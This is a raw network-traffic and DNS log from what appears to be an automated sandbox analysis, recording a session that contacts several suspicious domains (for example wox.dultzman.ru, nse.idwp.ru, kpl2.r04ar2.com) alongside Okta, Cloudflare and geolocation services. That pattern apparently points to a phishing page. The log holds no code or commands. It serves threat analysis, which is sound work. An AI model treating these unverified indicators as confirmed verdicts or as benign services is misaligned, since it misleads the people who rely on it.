                                                          Aug 28, 2024 00:11:23.914396048 CEST4434988752.165.165.26192.168.2.4
                                                          Aug 28, 2024 00:11:23.914408922 CEST4434988752.165.165.26192.168.2.4
                                                          Aug 28, 2024 00:11:23.914469004 CEST49887443192.168.2.452.165.165.26
                                                          Aug 28, 2024 00:11:23.914482117 CEST4434988752.165.165.26192.168.2.4
                                                          Aug 28, 2024 00:11:23.914510965 CEST49887443192.168.2.452.165.165.26
                                                          Aug 28, 2024 00:11:23.914530993 CEST49887443192.168.2.452.165.165.26
                                                          Aug 28, 2024 00:11:23.915754080 CEST4434988752.165.165.26192.168.2.4
                                                          Aug 28, 2024 00:11:23.915796995 CEST4434988752.165.165.26192.168.2.4
                                                          Aug 28, 2024 00:11:23.915827990 CEST49887443192.168.2.452.165.165.26
                                                          Aug 28, 2024 00:11:23.915833950 CEST4434988752.165.165.26192.168.2.4
                                                          Aug 28, 2024 00:11:23.915844917 CEST49887443192.168.2.452.165.165.26
                                                          Aug 28, 2024 00:11:23.916239023 CEST4434988752.165.165.26192.168.2.4
                                                          Aug 28, 2024 00:11:23.916284084 CEST49887443192.168.2.452.165.165.26
                                                          Aug 28, 2024 00:11:23.919460058 CEST49887443192.168.2.452.165.165.26
                                                          Aug 28, 2024 00:11:23.919476032 CEST4434988752.165.165.26192.168.2.4
                                                          Aug 28, 2024 00:11:23.919487000 CEST49887443192.168.2.452.165.165.26
                                                          Aug 28, 2024 00:11:23.919491053 CEST4434988752.165.165.26192.168.2.4
                                                          Aug 28, 2024 00:11:32.672136068 CEST49889443192.168.2.4172.217.16.132
                                                          Aug 28, 2024 00:11:32.672168970 CEST44349889172.217.16.132192.168.2.4
                                                          Aug 28, 2024 00:11:32.672230005 CEST49889443192.168.2.4172.217.16.132
                                                          Aug 28, 2024 00:11:32.672475100 CEST49889443192.168.2.4172.217.16.132
                                                          Aug 28, 2024 00:11:32.672491074 CEST44349889172.217.16.132192.168.2.4
                                                          Aug 28, 2024 00:11:33.302941084 CEST44349889172.217.16.132192.168.2.4
                                                          Aug 28, 2024 00:11:33.304925919 CEST49889443192.168.2.4172.217.16.132
                                                          Aug 28, 2024 00:11:33.304945946 CEST44349889172.217.16.132192.168.2.4
                                                          Aug 28, 2024 00:11:33.305285931 CEST44349889172.217.16.132192.168.2.4
                                                          Aug 28, 2024 00:11:33.308223009 CEST49889443192.168.2.4172.217.16.132
                                                          Aug 28, 2024 00:11:33.308284044 CEST44349889172.217.16.132192.168.2.4
                                                          Aug 28, 2024 00:11:33.358144999 CEST49889443192.168.2.4172.217.16.132
                                                          Aug 28, 2024 00:11:43.312756062 CEST44349889172.217.16.132192.168.2.4
                                                          Aug 28, 2024 00:11:43.312820911 CEST44349889172.217.16.132192.168.2.4
                                                          Aug 28, 2024 00:11:43.313152075 CEST49889443192.168.2.4172.217.16.132
                                                          Aug 28, 2024 00:11:44.141168118 CEST49889443192.168.2.4172.217.16.132
                                                          Aug 28, 2024 00:11:44.141190052 CEST44349889172.217.16.132192.168.2.4
                                                          Aug 28, 2024 00:12:05.096210957 CEST49891443192.168.2.435.190.80.1
                                                          Aug 28, 2024 00:12:05.096271992 CEST4434989135.190.80.1192.168.2.4
                                                          Aug 28, 2024 00:12:05.096332073 CEST49891443192.168.2.435.190.80.1
                                                          Aug 28, 2024 00:12:05.096870899 CEST49891443192.168.2.435.190.80.1
                                                          Aug 28, 2024 00:12:05.096888065 CEST4434989135.190.80.1192.168.2.4
                                                          Aug 28, 2024 00:12:06.327239037 CEST4434989135.190.80.1192.168.2.4
                                                          Aug 28, 2024 00:12:06.327816963 CEST49891443192.168.2.435.190.80.1
                                                          Aug 28, 2024 00:12:06.327850103 CEST4434989135.190.80.1192.168.2.4
                                                          Aug 28, 2024 00:12:06.328181982 CEST4434989135.190.80.1192.168.2.4
                                                          Aug 28, 2024 00:12:06.330775976 CEST49891443192.168.2.435.190.80.1
                                                          Aug 28, 2024 00:12:06.330840111 CEST4434989135.190.80.1192.168.2.4
                                                          Aug 28, 2024 00:12:06.331162930 CEST49891443192.168.2.435.190.80.1
                                                          Aug 28, 2024 00:12:06.372503996 CEST4434989135.190.80.1192.168.2.4
                                                          Aug 28, 2024 00:12:06.473647118 CEST4434989135.190.80.1192.168.2.4
                                                          Aug 28, 2024 00:12:06.474019051 CEST49891443192.168.2.435.190.80.1
                                                          Aug 28, 2024 00:12:06.474078894 CEST4434989135.190.80.1192.168.2.4
                                                          Aug 28, 2024 00:12:06.474144936 CEST49891443192.168.2.435.190.80.1
                                                          Aug 28, 2024 00:12:06.474652052 CEST49892443192.168.2.435.190.80.1
                                                          Aug 28, 2024 00:12:06.474692106 CEST4434989235.190.80.1192.168.2.4
                                                          Aug 28, 2024 00:12:06.474764109 CEST49892443192.168.2.435.190.80.1
                                                          Aug 28, 2024 00:12:06.474998951 CEST49892443192.168.2.435.190.80.1
                                                          Aug 28, 2024 00:12:06.475014925 CEST4434989235.190.80.1192.168.2.4
                                                          Aug 28, 2024 00:12:06.939153910 CEST4434989235.190.80.1192.168.2.4
                                                          Aug 28, 2024 00:12:06.939649105 CEST49892443192.168.2.435.190.80.1
                                                          Aug 28, 2024 00:12:06.939665079 CEST4434989235.190.80.1192.168.2.4
                                                          Aug 28, 2024 00:12:06.940696955 CEST4434989235.190.80.1192.168.2.4
                                                          Aug 28, 2024 00:12:06.940774918 CEST49892443192.168.2.435.190.80.1
                                                          Aug 28, 2024 00:12:06.941241980 CEST49892443192.168.2.435.190.80.1
                                                          Aug 28, 2024 00:12:06.941301107 CEST4434989235.190.80.1192.168.2.4
                                                          Aug 28, 2024 00:12:06.941458941 CEST49892443192.168.2.435.190.80.1
                                                          Aug 28, 2024 00:12:06.941467047 CEST4434989235.190.80.1192.168.2.4
                                                          Aug 28, 2024 00:12:06.983510017 CEST49892443192.168.2.435.190.80.1
                                                          Aug 28, 2024 00:12:07.067162991 CEST4434989235.190.80.1192.168.2.4
                                                          Aug 28, 2024 00:12:07.067231894 CEST4434989235.190.80.1192.168.2.4
                                                          Aug 28, 2024 00:12:07.067327023 CEST49892443192.168.2.435.190.80.1
                                                          Aug 28, 2024 00:12:07.085350037 CEST49892443192.168.2.435.190.80.1
                                                          Aug 28, 2024 00:12:07.085369110 CEST4434989235.190.80.1192.168.2.4
                                                          Aug 28, 2024 00:12:32.722975969 CEST49893443192.168.2.4172.217.16.132
                                                          Aug 28, 2024 00:12:32.723020077 CEST44349893172.217.16.132192.168.2.4
                                                          Aug 28, 2024 00:12:32.723231077 CEST49893443192.168.2.4172.217.16.132
                                                          Aug 28, 2024 00:12:32.723803043 CEST49893443192.168.2.4172.217.16.132
                                                          Aug 28, 2024 00:12:32.723814964 CEST44349893172.217.16.132192.168.2.4
                                                          Aug 28, 2024 00:12:33.406317949 CEST44349893172.217.16.132192.168.2.4
                                                          Aug 28, 2024 00:12:33.406955957 CEST49893443192.168.2.4172.217.16.132
                                                          Aug 28, 2024 00:12:33.406979084 CEST44349893172.217.16.132192.168.2.4
                                                          Aug 28, 2024 00:12:33.408337116 CEST44349893172.217.16.132192.168.2.4
                                                          Aug 28, 2024 00:12:33.409177065 CEST49893443192.168.2.4172.217.16.132
                                                          Aug 28, 2024 00:12:33.409240961 CEST44349893172.217.16.132192.168.2.4
                                                          Aug 28, 2024 00:12:33.452238083 CEST49893443192.168.2.4172.217.16.132
                                                          Aug 28, 2024 00:12:43.328620911 CEST44349893172.217.16.132192.168.2.4
                                                          Aug 28, 2024 00:12:43.328695059 CEST44349893172.217.16.132192.168.2.4
                                                          Aug 28, 2024 00:12:43.328834057 CEST49893443192.168.2.4172.217.16.132
                                                          Aug 28, 2024 00:12:44.142069101 CEST49893443192.168.2.4172.217.16.132
                                                          Aug 28, 2024 00:12:44.142101049 CEST44349893172.217.16.132192.168.2.4
                                                          Aug 28, 2024 00:12:47.491447926 CEST6523753192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:12:47.496474981 CEST53652371.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:12:47.496557951 CEST6523753192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:12:47.496623993 CEST6523753192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:12:47.501413107 CEST53652371.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:12:47.952178955 CEST53652371.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:12:47.956111908 CEST6523753192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:12:47.963433027 CEST53652371.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:12:47.963509083 CEST6523753192.168.2.41.1.1.1
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Aug 28, 2024 00:10:27.849307060 CEST53575661.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:10:27.902611017 CEST53525311.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:10:27.904191971 CEST53607711.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:10:28.912878990 CEST53632491.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:10:29.259222984 CEST5237853192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:10:29.259882927 CEST5189153192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:10:29.268826962 CEST53523781.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:10:29.268894911 CEST53518911.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:10:29.329309940 CEST53507021.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:10:29.940361977 CEST5591053192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:10:29.940510035 CEST6314053192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:10:29.955497980 CEST53631401.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:10:29.956478119 CEST53559101.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:10:32.620306015 CEST5671953192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:10:32.620753050 CEST6267953192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:10:32.629658937 CEST53567191.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:10:32.631213903 CEST53626791.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:10:33.137315035 CEST5234253192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:10:33.138214111 CEST5253553192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:10:33.150664091 CEST53523421.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:10:33.152317047 CEST53525351.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:10:38.036274910 CEST6495153192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:10:38.036583900 CEST6431153192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:10:38.037003994 CEST6239753192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:10:38.037247896 CEST5036153192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:10:38.037661076 CEST5623453192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:10:38.037851095 CEST5574953192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:10:38.041209936 CEST5617853192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:10:38.041486025 CEST6504253192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:10:38.043586016 CEST53643111.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:10:38.043740034 CEST53649511.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:10:38.043859959 CEST53623971.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:10:38.044231892 CEST53503611.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:10:38.044460058 CEST53562341.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:10:38.044894934 CEST53557491.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:10:38.050932884 CEST53561781.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:10:38.052700043 CEST53650421.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:10:38.855947018 CEST4986353192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:10:38.856293917 CEST6316553192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:10:38.862652063 CEST6248953192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:10:38.862867117 CEST53498631.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:10:38.862915993 CEST5627953192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:10:38.863039017 CEST53631651.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:10:38.869364023 CEST53624891.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:10:38.869927883 CEST53562791.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:10:39.400629044 CEST5477953192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:10:39.401048899 CEST5452353192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:10:39.409416914 CEST53547791.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:10:39.410357952 CEST53545231.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:10:40.147384882 CEST53493421.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:10:46.471256971 CEST53506461.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:10:48.966048956 CEST138138192.168.2.4192.168.2.255
                                                          Aug 28, 2024 00:11:03.468509912 CEST5973453192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:11:03.468656063 CEST5558253192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:11:03.485218048 CEST53555821.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:03.634663105 CEST53597341.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:05.048029900 CEST6351053192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:11:05.048029900 CEST6113753192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:11:05.255229950 CEST53635101.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:05.255881071 CEST53611371.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:05.255891085 CEST53587861.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:06.737354994 CEST5164253192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:11:06.737751007 CEST6305553192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:11:06.744118929 CEST5117453192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:11:06.744275093 CEST5529953192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:11:06.745042086 CEST6197453192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:11:06.745192051 CEST4969053192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:11:06.746649981 CEST53630551.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:06.749564886 CEST53516421.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:06.752640009 CEST5218253192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:11:06.752680063 CEST53511741.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:06.752775908 CEST6219153192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:11:06.753035069 CEST53619741.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:06.753045082 CEST53496901.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:06.753195047 CEST53552991.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:06.764017105 CEST53521821.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:06.772898912 CEST53621911.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:07.684554100 CEST6493253192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:11:07.684710979 CEST5177753192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:11:07.692989111 CEST53649321.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:07.693264008 CEST53517771.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:07.806041002 CEST5967653192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:11:07.806267977 CEST5465153192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:11:07.814215899 CEST53596761.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:07.815242052 CEST53546511.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:07.818717957 CEST6464253192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:11:07.818916082 CEST6190353192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:11:07.827498913 CEST53646421.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:07.841056108 CEST53619031.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:08.699120045 CEST5397453192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:11:08.699489117 CEST6552153192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:11:08.708456039 CEST53539741.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:08.708605051 CEST53655211.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:09.837335110 CEST53651131.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:10.424020052 CEST53559861.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:10.622332096 CEST5034553192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:11:10.623069048 CEST6293453192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:11:10.630398035 CEST53503451.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:10.630795002 CEST53629341.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:11.281435013 CEST5782153192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:11:11.281706095 CEST5923653192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:11:11.282037973 CEST6471353192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:11:11.282154083 CEST6223653192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:11:11.288680077 CEST53647131.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:11.292407036 CEST53622361.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:11.370148897 CEST53592361.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:11.438559055 CEST5645253192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:11:11.439014912 CEST6226253192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:11:11.457130909 CEST53564521.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:11.459904909 CEST53622621.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:11.509155989 CEST53578211.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:11.920310020 CEST53615071.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:13.196470022 CEST5004053192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:11:13.197050095 CEST5489653192.168.2.41.1.1.1
                                                          Aug 28, 2024 00:11:13.209302902 CEST53548961.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:13.365185976 CEST53500401.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:27.547204971 CEST53647081.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:28.064950943 CEST53492601.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:11:56.854509115 CEST53636241.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:12:42.434679031 CEST53520821.1.1.1192.168.2.4
                                                          Aug 28, 2024 00:12:47.491017103 CEST53641531.1.1.1192.168.2.4
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Aug 28, 2024 00:10:29.259222984 CEST192.168.2.41.1.1.10xbf42Standard query (0)href.liA (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:29.259882927 CEST192.168.2.41.1.1.10x329fStandard query (0)href.li65IN (0x0001)false
                                                          Aug 28, 2024 00:10:29.940361977 CEST192.168.2.41.1.1.10x8d9aStandard query (0)kpl2.r04ar2.comA (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:29.940510035 CEST192.168.2.41.1.1.10xab88Standard query (0)kpl2.r04ar2.com65IN (0x0001)false
                                                          Aug 28, 2024 00:10:32.620306015 CEST192.168.2.41.1.1.10xe00bStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:32.620753050 CEST192.168.2.41.1.1.10xd10cStandard query (0)www.google.com65IN (0x0001)false
                                                          Aug 28, 2024 00:10:33.137315035 CEST192.168.2.41.1.1.10xb3b8Standard query (0)wox.dultzman.ruA (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:33.138214111 CEST192.168.2.41.1.1.10x3653Standard query (0)wox.dultzman.ru65IN (0x0001)false
                                                          Aug 28, 2024 00:10:38.036274910 CEST192.168.2.41.1.1.10x5b01Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:38.036583900 CEST192.168.2.41.1.1.10xa6c5Standard query (0)code.jquery.com65IN (0x0001)false
                                                          Aug 28, 2024 00:10:38.037003994 CEST192.168.2.41.1.1.10xc5f3Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:38.037247896 CEST192.168.2.41.1.1.10x36e7Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                          Aug 28, 2024 00:10:38.037661076 CEST192.168.2.41.1.1.10xd8e8Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:38.037851095 CEST192.168.2.41.1.1.10xc763Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                          Aug 28, 2024 00:10:38.041209936 CEST192.168.2.41.1.1.10xa130Standard query (0)wox.dultzman.ruA (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:38.041486025 CEST192.168.2.41.1.1.10x1092Standard query (0)wox.dultzman.ru65IN (0x0001)false
                                                          Aug 28, 2024 00:10:38.855947018 CEST192.168.2.41.1.1.10xb082Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:38.856293917 CEST192.168.2.41.1.1.10xf664Standard query (0)code.jquery.com65IN (0x0001)false
                                                          Aug 28, 2024 00:10:38.862652063 CEST192.168.2.41.1.1.10x12b5Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:38.862915993 CEST192.168.2.41.1.1.10xa95dStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                          Aug 28, 2024 00:10:39.400629044 CEST192.168.2.41.1.1.10x5752Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:39.401048899 CEST192.168.2.41.1.1.10xd6f3Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                          Aug 28, 2024 00:11:03.468509912 CEST192.168.2.41.1.1.10xd7e7Standard query (0)kpl2.r04ar2.comA (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:03.468656063 CEST192.168.2.41.1.1.10x8b49Standard query (0)kpl2.r04ar2.com65IN (0x0001)false
                                                          Aug 28, 2024 00:11:05.048029900 CEST192.168.2.41.1.1.10x38aStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:05.048029900 CEST192.168.2.41.1.1.10x921dStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                          Aug 28, 2024 00:11:06.737354994 CEST192.168.2.41.1.1.10x642aStandard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:06.737751007 CEST192.168.2.41.1.1.10xfa40Standard query (0)cdn.socket.io65IN (0x0001)false
                                                          Aug 28, 2024 00:11:06.744118929 CEST192.168.2.41.1.1.10x4ff0Standard query (0)github.comA (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:06.744275093 CEST192.168.2.41.1.1.10xe53fStandard query (0)github.com65IN (0x0001)false
                                                          Aug 28, 2024 00:11:06.745042086 CEST192.168.2.41.1.1.10x3a22Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:06.745192051 CEST192.168.2.41.1.1.10x8917Standard query (0)www.google.com65IN (0x0001)false
                                                          Aug 28, 2024 00:11:06.752640009 CEST192.168.2.41.1.1.10x7fc9Standard query (0)ok4static.oktacdn.comA (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:06.752775908 CEST192.168.2.41.1.1.10x6f8aStandard query (0)ok4static.oktacdn.com65IN (0x0001)false
                                                          Aug 28, 2024 00:11:07.684554100 CEST192.168.2.41.1.1.10xeccStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:07.684710979 CEST192.168.2.41.1.1.10x7d4bStandard query (0)www.google.com65IN (0x0001)false
                                                          Aug 28, 2024 00:11:07.806041002 CEST192.168.2.41.1.1.10xc6b6Standard query (0)objects.githubusercontent.comA (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:07.806267977 CEST192.168.2.41.1.1.10xbf40Standard query (0)objects.githubusercontent.com65IN (0x0001)false
                                                          Aug 28, 2024 00:11:07.818717957 CEST192.168.2.41.1.1.10x3f7eStandard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:07.818916082 CEST192.168.2.41.1.1.10xaf9Standard query (0)cdn.socket.io65IN (0x0001)false
                                                          Aug 28, 2024 00:11:08.699120045 CEST192.168.2.41.1.1.10xb641Standard query (0)objects.githubusercontent.comA (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:08.699489117 CEST192.168.2.41.1.1.10xf433Standard query (0)objects.githubusercontent.com65IN (0x0001)false
                                                          Aug 28, 2024 00:11:10.622332096 CEST192.168.2.41.1.1.10x3d92Standard query (0)get.geojs.ioA (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:10.623069048 CEST192.168.2.41.1.1.10xbc0Standard query (0)get.geojs.io65IN (0x0001)false
                                                          Aug 28, 2024 00:11:11.281435013 CEST192.168.2.41.1.1.10x413bStandard query (0)nse.idwp.ruA (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:11.281706095 CEST192.168.2.41.1.1.10xba70Standard query (0)nse.idwp.ru65IN (0x0001)false
                                                          Aug 28, 2024 00:11:11.282037973 CEST192.168.2.41.1.1.10x2b7cStandard query (0)get.geojs.ioA (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:11.282154083 CEST192.168.2.41.1.1.10xd9ecStandard query (0)get.geojs.io65IN (0x0001)false
                                                          Aug 28, 2024 00:11:11.438559055 CEST192.168.2.41.1.1.10xa6e1Standard query (0)ok4static.oktacdn.comA (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:11.439014912 CEST192.168.2.41.1.1.10x502bStandard query (0)ok4static.oktacdn.com65IN (0x0001)false
                                                          Aug 28, 2024 00:11:13.196470022 CEST192.168.2.41.1.1.10xdefbStandard query (0)nse.idwp.ruA (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:11:13.197050095 CEST192.168.2.41.1.1.10x4c17Standard query (0)nse.idwp.ru65IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Aug 28, 2024 00:10:29.268826962 CEST1.1.1.1192.168.2.40xbf42No error (0)href.li192.0.78.26A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:29.268826962 CEST1.1.1.1192.168.2.40xbf42No error (0)href.li192.0.78.27A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:29.955497980 CEST1.1.1.1192.168.2.40xab88No error (0)kpl2.r04ar2.com65IN (0x0001)false
                                                          Aug 28, 2024 00:10:29.956478119 CEST1.1.1.1192.168.2.40x8d9aNo error (0)kpl2.r04ar2.com188.114.96.3A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:29.956478119 CEST1.1.1.1192.168.2.40x8d9aNo error (0)kpl2.r04ar2.com188.114.97.3A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:32.629658937 CEST1.1.1.1192.168.2.40xe00bNo error (0)www.google.com172.217.16.132A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:32.631213903 CEST1.1.1.1192.168.2.40xd10cNo error (0)www.google.com65IN (0x0001)false
                                                          Aug 28, 2024 00:10:33.150664091 CEST1.1.1.1192.168.2.40xb3b8No error (0)wox.dultzman.ru188.114.97.3A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:33.150664091 CEST1.1.1.1192.168.2.40xb3b8No error (0)wox.dultzman.ru188.114.96.3A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:33.152317047 CEST1.1.1.1192.168.2.40x3653No error (0)wox.dultzman.ru65IN (0x0001)false
                                                          Aug 28, 2024 00:10:38.043740034 CEST1.1.1.1192.168.2.40x5b01No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:38.043740034 CEST1.1.1.1192.168.2.40x5b01No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:38.043740034 CEST1.1.1.1192.168.2.40x5b01No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:38.043740034 CEST1.1.1.1192.168.2.40x5b01No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:38.043859959 CEST1.1.1.1192.168.2.40xc5f3No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:38.043859959 CEST1.1.1.1192.168.2.40xc5f3No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                          Aug 28, 2024 00:10:38.044231892 CEST1.1.1.1192.168.2.40x36e7No error (0)challenges.cloudflare.com65IN (0x0001)false
